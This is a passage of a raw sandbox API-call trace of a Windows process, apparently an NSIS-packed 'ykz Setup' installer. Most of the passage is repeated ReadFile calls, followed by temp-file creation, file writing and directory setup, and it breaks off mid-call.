lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.669] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.670] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.671] GetTickCount () returned 0x18a74d5 [0056.671] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsv", uUnique=0x0, lpTempFileName=0x19fcc0 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsv74D6.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsv74d6.tmp")) returned 0x74d6 [0056.676] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsv74D6.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsv74d6.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x4000100, hTemplateFile=0x0) returned 0x1dc [0056.677] SetFilePointer (in: hFile=0x200, lDistanceToMove=33820, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x841c [0056.677] GetTickCount () returned 0x18a74d5 [0056.677] SetFilePointer (in: hFile=0x200, lDistanceToMove=33820, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x841c [0056.677] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0056.678] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fc68, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fc68*=0x4000, lpOverlapped=0x0) returned 1 [0056.866] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x5de5, lpNumberOfBytesWritten=0x19fc7c, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fc7c*=0x5de5, lpOverlapped=0x0) returned 1 [0056.877] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0056.878] ReadFile (in: hFile=0x1dc, lpBuffer=0x19fca4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fc98, lpOverlapped=0x0 | out: lpBuffer=0x19fca4*, lpNumberOfBytesRead=0x19fc98*=0x4, lpOverlapped=0x0) returned 1 [0056.878] GetTickCount () returned 0x18a75b0 [0056.878] ReadFile (in: hFile=0x1dc, lpBuffer=0x4a8f88, nNumberOfBytesToRead=0x2134, lpNumberOfBytesRead=0x19fc98, lpOverlapped=0x0 | out: lpBuffer=0x4a8f88*, lpNumberOfBytesRead=0x19fc98*=0x2134, lpOverlapped=0x0) returned 1 [0056.878] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x77340000 [0056.878] GetProcAddress (hModule=0x77340000, lpProcName="GetUserDefaultUILanguage") returned 0x7735b0a0 [0056.879] GetUserDefaultUILanguage () returned 0x409 [0056.879] wsprintfA (in: param_1=0x42b000, param_2="%d" | out: param_1="1033") returned 4 [0056.879] wsprintfA (in: param_1=0x42b000, param_2="%d" | out: param_1="1033") returned 4 [0056.879] lstrlenA (lpString="ykz") returned 3 [0056.879] lstrcpynA (in: lpString1=0x423780, lpString2="ykz Setup", iMaxLength=1024 | out: lpString1="ykz Setup") returned="ykz Setup" [0056.879] SetWindowTextA (hWnd=0x0, lpString="ykz Setup") returned 0 [0056.879] lstrcpynA (in: lpString1=0x4a914c, lpString2="uvlkbibpufvck", iMaxLength=1024 | out: lpString1="uvlkbibpufvck") returned="uvlkbibpufvck" [0056.879] lstrcpynA (in: lpString1=0x4a9564, lpString2="hovukewftjgoeo", iMaxLength=1024 | out: lpString1="hovukewftjgoeo") returned="hovukewftjgoeo" [0056.879] lstrcpynA (in: lpString1=0x4a997c, lpString2="oakaiattlrfz", iMaxLength=1024 | out: lpString1="oakaiattlrfz") returned="oakaiattlrfz" [0056.879] lstrcpynA (in: lpString1=0x421988, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.879] lstrcpynA (in: lpString1=0x421988, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.879] lstrcpynA (in: lpString1=0x422f20, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0056.880] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0056.880] lstrcpynA (in: lpString1=0x42a400, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.880] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x60229 [0056.882] lstrcpynA (in: lpString1=0x422f20, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.882] lstrlenA (lpString="") returned 0 [0056.883] lstrcpynA (in: lpString1=0x40a450, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.883] lstrcpynA (in: lpString1=0x40a850, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.883] lstrcmpiA (lpString1="", lpString2="") returned 0 [0056.883] lstrcpynA (in: lpString1=0x422f20, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.883] lstrlenA (lpString="") returned 0 [0056.883] lstrcpynA (in: lpString1=0x4a2a54, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.883] lstrcpynA (in: lpString1=0x422f20, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0056.883] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0056.883] lstrcpynA (in: lpString1=0x40a050, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.883] GetTickCount () returned 0x18a75b0 [0056.883] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsg", uUnique=0x0, lpTempFileName=0x425000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp")) returned 0x75b2 [0056.885] lstrcpynA (in: lpString1=0x422f20, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.885] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0056.885] lstrcpynA (in: lpString1=0x409c50, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.885] lstrcpynA (in: lpString1=0x421988, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.885] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0056.885] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8092087, ftCreationTime.dwHighDateTime=0x1d900af, ftLastAccessTime.dwLowDateTime=0xf8092087, ftLastAccessTime.dwHighDateTime=0x1d900af, ftLastWriteTime.dwLowDateTime=0xf8092087, ftLastWriteTime.dwHighDateTime=0x1d900af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c006c, dwReserved1=0x650054, cFileName="nsg75B2.tmp", cAlternateFileName="")) returned 0x4956c8 [0056.885] FindClose (in: hFindFile=0x4956c8 | out: hFindFile=0x4956c8) returned 1 [0056.885] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp")) returned 1 [0056.886] lstrcpynA (in: lpString1=0x422f20, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.886] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0056.886] lstrcpynA (in: lpString1=0x40a050, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.886] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0056.886] GetLastError () returned 0xb7 [0056.886] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0056.886] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0056.886] GetLastError () returned 0xb7 [0056.886] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0056.886] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0056.886] GetLastError () returned 0xb7 [0056.886] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0056.887] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0056.887] GetLastError () returned 0xb7 [0056.887] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0056.887] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: 